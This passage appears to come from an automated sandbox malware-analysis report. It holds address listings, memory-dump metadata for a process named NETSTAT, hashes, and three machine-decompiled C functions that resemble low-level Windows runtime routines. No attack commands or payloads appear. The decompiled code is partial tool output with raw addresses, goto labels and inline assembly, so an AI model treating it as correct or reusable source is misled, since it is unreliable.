                0x03368662
                0x03368666
                0x00000000
                0x03368666
                0x033685b7
                0x033685b9
                0x033685bc
                0x033685bf
                0x033685cc
                0x033685d1
                0x033685d4
                0x033685db
                0x033685de
                0x033685e0
                0x033b9b5f
                0x00000000
                0x033b9b5f
                0x033685e6
                0x033685ea
                0x033686c3
                0x033686c5
                0x033686c8
                0x033686ca
                0x033b9b16
                0x00000000
                0x033b9b16
                0x033686d6
                0x033685f6
                0x033685f6
                0x033685f9
                0x03368602
                0x03368606
                0x0336860a
                0x0336860b
                0x0336860e
                0x03368611
                0x00000000
                0x03368611
                0x033685f3
                0x00000000
                0x033685f3
                0x03368619
                0x0336861e
                0x0336861e
                0x03368621
                0x03368622
                0x03368623
                0x03368625
                0x0336862c
                0x00000000
                0x0336873d
                0x00000000
                0x0336873d
                0x03368737
                0x0336850f
                0x03368512
                0x00000000
                0x03368512
                0x00000000
                0x033684d6

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 278ca999cbbe79888a8d624884e7b4d4785f9c9d674aa7881202b34cb7eee28f
                • Instruction ID: 5a342dae30c77c74b0cffae0be13a279aebdc1200633ce0e78faedbee4770aba
                • Opcode Fuzzy Hash: 278ca999cbbe79888a8d624884e7b4d4785f9c9d674aa7881202b34cb7eee28f
                • Instruction Fuzzy Hash: 28B15CB4E00349DFDB15DFA8C9C4AADBBB9FF48304F14812AE615AF649D770A942CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0338513A Relevance: .3, Instructions: 258COMMON
                Download Yara Rule
                C-Code - Quality: 67%
                			E0338513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x344d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0339D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E03372280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L03374620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0339F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0336FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x344b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0339B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                0x03385142
                0x0338514c
                0x03385150
                0x03385157
                0x03385159
                0x0338515e
                0x03385165
                0x03385169
                0x0338516c
                0x03385172
                0x03385176
                0x0338517a
                0x0338517a
                0x0338517a
                0x0338517f
                0x033c6d8b
                0x033c6d8e
                0x033c6d91
                0x033c6d95
                0x033c6d98
                0x033c6d9c
                0x033c6da0
                0x033c6da3
                0x033c6da7
                0x033c6e26
                0x033c6e26
                0x033c6e2a
                0x033851f9
                0x033851f9
                0x033851fe
                0x033c6e33
                0x033c6e33
                0x033c6e39
                0x033c6e3d
                0x033c6e46
                0x033c6e50
                0x00000000
                0x00000000
                0x033c6e52
                0x033c6e53
                0x033c6e56
                0x033c6e5d
                0x00000000
                0x00000000
                0x00000000
                0x033c6e5f
                0x033c6e67
                0x033c6e77
                0x033c6e7f
                0x033c6e80
                0x033c6e88
                0x033c6e90
                0x033c6e9f
                0x033c6ea5
                0x033c6ea9
                0x033c6eb1
                0x033c6ebf
                0x00000000
                0x00000000
                0x033c6ecf
                0x033c6ed3
                0x00000000
                0x00000000
                0x033c6edb
                0x033c6ede
                0x033c6ee1
                0x033c6ee8
                0x033c6eeb
                0x033c6eed
                0x033c6ef0
                0x033c6ef4
                0x033c6ef8
                0x033c6efc
                0x00000000
                0x00000000
                0x033c6f0d
                0x033c6f11
                0x033c6f32
                0x033c6f37
                0x033c6f3b
                0x033c6f3e
                0x033c6f41
                0x033c6f46
                0x00000000
                0x00000000
                0x033c6f4c
                0x033c6f50
                0x033c6f50
                0x033c6f54
                0x033c6f62
                0x033c6f65
                0x033c6f6d
                0x033c6f7b
                0x033c6f7b
                0x033c6f93
                0x033c6f98
                0x033c6fa0
                0x033c6fa6
                0x033c6fb3
                0x033c6fb6
                0x033c6fbf
                0x033c6fc1
                0x033c6fd5
                0x033c6fda
                0x033c6fda
                0x033c6fdd
                0x033c6fe2
                0x033c6fe7
                0x033c6feb
                0x033c6fef
                0x033c6ff3
                0x0338520c
                0x0338520c
                0x0338520f
                0x03385215
                0x03385234
                0x0338523a
                0x0338523a
                0x03385244
                0x03385245
                0x03385246
                0x03385251
                0x03385251
                0x033c6f13
                0x033c6f17
                0x033c6f17
                0x033c6f18
                0x033c6f1b
                0x033c6f1f
                0x033c6f23
                0x00000000
                0x033c6f28
                0x03385204
                0x03385204
                0x03385208
                0x00000000
                0x03385208
                0x03385185
                0x03385188
                0x0338518a
                0x0338518e
                0x03385195
                0x033c6db1
                0x033c6db5
                0x033c6db9
                0x0338519b
                0x0338519b
                0x0338519e
                0x033851a7
                0x033851a9
                0x033851a9
                0x033851b5
                0x033851b8
                0x033851bb
                0x033851be
                0x033851c1
                0x033851c5
                0x033851c9
                0x033851cd
                0x033851cd
                0x033851d8
                0x033851dc
                0x033851e0
                0x033c6dcc
                0x033c6dd0
                0x033c6dd5
                0x033c6ddd
                0x033c6de1
                0x033c6de1
                0x033c6de5
                0x033c6deb
                0x033c6df1
                0x033c6df7
                0x033c6dfd
                0x033c6e01
                0x033c6e05
                0x033c6e09
                0x033c6e0d
                0x033c6e11
                0x033c6e11
                0x033851eb
                0x033c6e1a
                0x033c6e1f
                0x033c6e21
                0x033c6e23
                0x00000000
                0x033851f1
                0x033851f1
                0x00000000
                0x033851f1

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0d6fa4f64d1d00c37cfa609d75d3d5f07b9cea605db5f92f873e89b1b6fbad00
                • Instruction ID: 70bd993183e0165ff7bf9b45654ef80e89b1be49b986a371e5170d8d9d8e2a39
                • Opcode Fuzzy Hash: 0d6fa4f64d1d00c37cfa609d75d3d5f07b9cea605db5f92f873e89b1b6fbad00
                • Instruction Fuzzy Hash: ACC133755083808FD354CF28C980A6AFBF1BF89304F184A6EF8998B362D775E845CB42
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033803E2 Relevance: .3, Instructions: 254COMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E033803E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x344d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E03380548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0339B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0336B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x3447c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E03377D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E03377D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E033D7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03399830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E033D69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x3447c04 != 0) {
						_t118 = _v12;
						_t120 = E033DA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x3447bd8;
						if( *0x3447bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E033995D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E033999A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E033D3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0335B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0339AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x3448474 - 3;
										if( *0x3448474 != 3) {
											 *0x34479dc =  *0x34479dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E03377D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E03377D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E033D7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x3448708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x3447b00; // 0x0
							asm("ror esi, cl");
							 *0x344b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E033995D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E03367F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                0x033803f1
                0x033803f7
                0x033803f9
                0x033803fb
                0x033803fd
                0x03380400
                0x0338040a
                0x033c4c7a
                0x03380537
                0x03380547
                0x03380410
                0x03380410
                0x03380414
                0x03380417
                0x0338041a
                0x03380421
                0x03380424
                0x0338042b
                0x0338043b
                0x0338043e
                0x0338043f
                0x0338043f
                0x03380446
                0x03380449
                0x0338044c
                0x0338044f
                0x03380459
                0x033c4c8d
                0x0338045f
                0x0338045f
                0x0338045f
                0x03380467
                0x033c4c97
                0x033c4c9d
                0x033c4ca4
                0x033c4caa
                0x033c4caf
                0x033c4cb1
                0x033c4cc3
                0x033c4cb3
                0x033c4cbc
                0x033c4cbc
                0x033c4cc8
                0x033c4ccb
                0x033c4cd7
                0x033c4cda
                0x033c4cdf
                0x033c4cdf
                0x033c4ccb
                0x033c4ca4
                0x0338046d
                0x0338046f
                0x0338046f
                0x03380471
                0x03380476
                0x0338047a
                0x0338047b
                0x03380483
                0x03380489
                0x0338048d
                0x00000000
                0x00000000
                0x033c4ce9
                0x033c4cef
                0x033c4d22
                0x033c4d22
                0x00000000
                0x033c4d22
                0x033c4cf1
                0x033c4cf7
                0x00000000
                0x00000000
                0x033c4cf9
                0x033c4cff
                0x00000000
                0x00000000
                0x033c4d05
                0x033c4d07
                0x00000000
                0x00000000
                0x033c4d0d
                0x033c4d0f
                0x033c4d14
                0x033c4d16
                0x00000000
                0x00000000
                0x033c4d1c
                0x033c4d1c
                0x03380499
                0x03380535
                0x03380535
                0x00000000
                0x03380535
                0x033804a6
                0x033c4d2c
                0x033c4d37
                0x033c4d39
                0x033c4d3b
                0x00000000
                0x00000000
                0x033c4d41
                0x033c4d48
                0x03380527
                0x0338052b
                0x0338052d
                0x03380530
                0x03380530
                0x00000000
                0x0338052b
                0x033c4d4e
                0x033804ac
                0x033804ac
                0x033804af
                0x033804b2
                0x033804b7
                0x033804b9
                0x033804bb
                0x033804bd
                0x033804bf
                0x033804c5
                0x033804c9
                0x033c4d53
                0x033c4d59
                0x033c4db9
                0x033c4dba
                0x033c4dbf
                0x033c4dc2
                0x033c4dc4
                0x033c4dc7
                0x033c4dce
                0x00000000
                0x033c4dce
                0x033c4d5b
                0x033c4d61
                0x00000000
                0x00000000
                0x033c4d63
                0x033c4d69
                0x00000000
                0x00000000
                0x033c4d6b
                0x033c4d6e
                0x033c4d74
                0x033c4d76
                0x033c4d7c
                0x033c4d7e
                0x033c4d84
                0x033c4d89
                0x033c4d8c
                0x033c4d8d
                0x033c4d92
                0x033c4d95
                0x033c4d96
                0x033c4d98
                0x033c4d9a
                0x033c4d9f
                0x033c4da4
                0x033c4da6
                0x033c4da8
                0x033c4daf
                0x033c4db1
                0x033c4db1
                0x033c4daf
                0x033c4da6
                0x033c4d84
                0x033c4d7c
                0x00000000
                0x033c4d74
                0x033804d6
                0x033c4de1
                0x033804dc
                0x033804dc
                0x033804dc
                0x033804e4
                0x033c4deb
                0x033c4df1
                0x033c4df8
                0x033c4dfe
                0x033c4e03
                0x033c4e05
                0x033c4e17
                0x033c4e07
                0x033c4e10
                0x033c4e10
                0x033c4e1c
                0x033c4e1f
                0x033c4e35
                0x033c4e35
                0x033c4e1f
                0x033c4df8
                0x033804f1
                0x033804fa
                0x033c4e3f
                0x033c4e47
                0x033c4e5b
                0x033c4e61
                0x033c4e67
                0x033c4e69
                0x033c4e71
                0x033c4e73
                0x03380500
                0x03380500
                0x03380500
                0x033804fa
                0x03380508
                0x0338051d
                0x0338051d
                0x0338051f
                0x03380524
                0x00000000
                0x03380524
                0x03380515
                0x03380517
                0x033c4e7a
                0x033c4e7c
                0x00000000
                0x00000000
                0x033c4e85
                0x00000000
                0x033c4e85
                0x00000000
                0x03380517

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fec83fb0c4cd544d346b28ceaffb39883141968e1c4f6771ef17882145d6eefd
                • Instruction ID: 62c762db9f24d68d4c0acc6602a05319c1f3334fd57c355e7f9a6ce9770137e2
                • Opcode Fuzzy Hash: fec83fb0c4cd544d346b28ceaffb39883141968e1c4f6771ef17882145d6eefd
                • Instruction Fuzzy Hash: 5A915D31E04354AFEF36EB69CCD8B6DBBA8AB01714F090265E910AB2D1D7749C44C791
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0335C600 Relevance: .2, Instructions: 225COMMON
                Download Yara Rule
                C-Code - Quality: 67%
                			E0335C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x344d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E03366D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0339B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x3447b9c; // 0x0
					_t74 = L03374620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03399650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L033777F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0339F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E033913C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
